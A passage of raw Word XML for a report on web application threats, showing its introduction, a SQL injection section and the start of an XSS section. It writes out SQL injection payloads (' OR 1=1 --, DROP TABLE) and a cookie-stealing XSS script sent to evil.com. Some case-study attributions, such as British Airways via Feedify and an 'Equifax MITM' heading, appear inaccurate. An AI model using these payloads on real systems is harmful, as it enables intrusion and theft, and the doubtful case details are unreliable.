          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD6E6F7" w14:textId="0E224DA7" w:rsidR="00075C06" w:rsidRPr="00967003"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075C06" w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Session Hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42674090"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5.1 Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E249BF3"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5.2 Case Study: Firebase Misconfiguration (2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F5F44"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5.3 Mitigation Strategies  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A769111" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A7F918" w14:textId="60C519C1" w:rsidR="00075C06" w:rsidRPr="00967003"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967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00075C06" w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>an-in-the-Middle (MITM) Attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240BBEE0"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6.1 Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A650D8"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6.2 Case Study: Equifax MITM Exposure (2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14786007"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.3 Mitigation Strategies  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908977A" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A8003C" w14:textId="68E8CB77" w:rsidR="00075C06" w:rsidRPr="00075C06"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075C06" w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DBA44" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487F8C95" w14:textId="4F0DF3D4" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00967003" w:rsidP="00075C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075C06" w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60410DB6" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00075C06" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB7FA4D"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1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A2720"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Web applications have become indispensable, underpinning everything from online shopping to telemedicine. By 2025, the global web application market is forecasted to surpass $100 billion, propelled by cloud computing, mobile proliferation, and the expanding Internet of Things (IoT). However, this digital transformation has made web systems lucrative targets for cybercriminals exploiting vulnerabilities for financial gain, espionage, or chaos. The Verizon Data Breach Investigations Report (2020) found that 43% of breaches involved web applications—a percentage likely higher now as attack tools grow more advanced. IBM’s 2023 Cost of a Data Breach Report estimates an average breach cost of $4.35 million, with incidents like the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> breach inflating damages into the billions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038BD796"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This report examines five critical threats: SQL Injection, Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Session Hijacking, and Man-in-the-Middle (MITM) Attacks. These vulnerabilities often stem from unvalidated inputs, insecure session handling, or unencrypted communications, compounded by the complexity of modern frameworks like React, Angular, and Node.js. As we advance into 2025, emerging challenges—AI-driven attack automation, quantum </w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>computing risks, and IoT-related weaknesses—elevate the urgency of robust security measures. Through detailed technical breakdowns, real-world case studies, and practical mitigation strategies, this report empowers developers and security professionals to safeguard web ecosystems. The analysis is supported by recent data and credible, accessible references, offering a comprehensive view of web security today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DA4A9E" w14:textId="77777777" w:rsidR="00075C06" w:rsidRPr="00967003" w:rsidRDefault="00075C06" w:rsidP="00075C06">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D60EC"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2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C0930"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SQL Injection allows attackers to manipulate database queries by injecting malicious SQL code through user inputs. This vulnerability arises when applications concatenate unvalidated data into SQL statements, enabling attackers to alter query intent. For instance, a login query like SELECT * FROM users WHERE username = '$username' AND password = '$password' can be exploited by entering ' OR 1=1 -- as the username, transforming it into SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = '$password'. Here, 1=1 ensures a true condition, and -- comments out the password check, granting unauthorized access. Attackers can escalate this to extract metadata (UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), update records (UPDATE users SET password = 'hacked' WHERE username = 'admin'), or erase data (DROP TABLE users), depending on permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E694CE8"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2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Case Study</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer Breach (2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B82B4A"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In May 2023, a SQL Injection vulnerability in Progress Software’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer application sparked a monumental breach. The Clop ransomware gang exploited this flaw, targeting a file transfer tool used by over 2,000 organizations, including U.S. federal agencies, Shell, and British Airways. By injecting SQL code, attackers deployed a web shell to exfiltrate sensitive data—Social </w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Security numbers, financial records, and employee details—over several weeks. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BleepingComputer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2023) reported losses exceeding $10 billion, with Clop issuing ransom demands up to $100 million. “This was a textbook case of third-party risk,” said cybersecurity expert Brian Krebs, noting how a single flaw in a trusted tool caused widespread havoc. The breach prompted emergency patches, lawsuits, and a reevaluation of software supply chain security across industries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C61628A"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2.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E2BDC"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Preventing SQL Injection demands rigorous coding practices. Parameterized queries, such as $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pdo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prepare(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM users WHERE username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"); $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[$username, $password]); in PHP, isolate data from SQL logic, rendering injections ineffective. Input validation—whitelisting expected formats (e.g., [a-zA-Z0-9] via regular expressions)—blocks malformed entries early. Web Application Firewalls (WAFs) like Cloudflare or Imperva detect and filter suspicious patterns, though they may struggle with encoded or fragmented attacks. Applying the least privilege principle—restricting database users to minimal permissions (e.g., read-only for public queries, no DROP rights)—limits damage potential. Regular security audits, penetration testing with tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and monitoring query logs for anomalies ensure ongoing protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB58E23"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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091A87E5"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3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Definition and Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DC11FD"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Cross-Site Scripting (XSS) injects malicious JavaScript into web pages, executing in users’ browsers to steal data, redirect users, or manipulate content. It manifests in three forms: Stored (persistent, saved in databases, e.g., forum posts), Reflected (non-persistent, via URL parameters </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>like ?search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&lt;script&gt;), and DOM-based (client-side, altering the Document Object Model). For example, submitting &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>='http://evil.com?cookie='+document.cookie;&lt;/script&gt; to a comment field, if unfiltered, sends users’ cookies to an attacker’s server. XSS can also log keystrokes (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onkeydown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sendKeys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(event)"), display fake login prompts, or install malware, exploiting trust in legitimate domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB00C8"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3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Case Study</w:t>
      </w:r>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00967003">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>British Airways XSS Attack (2018)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49EBBF"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In September 2018, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Magecart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> group exploited an XSS vulnerability in British Airways’ payment system via a compromised third-party script (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Feedify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). Over 22 days, attackers skimmed 380,000 transactions, redirecting credit card details to a fake domain (baways.com). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RiskIQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00075C06">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
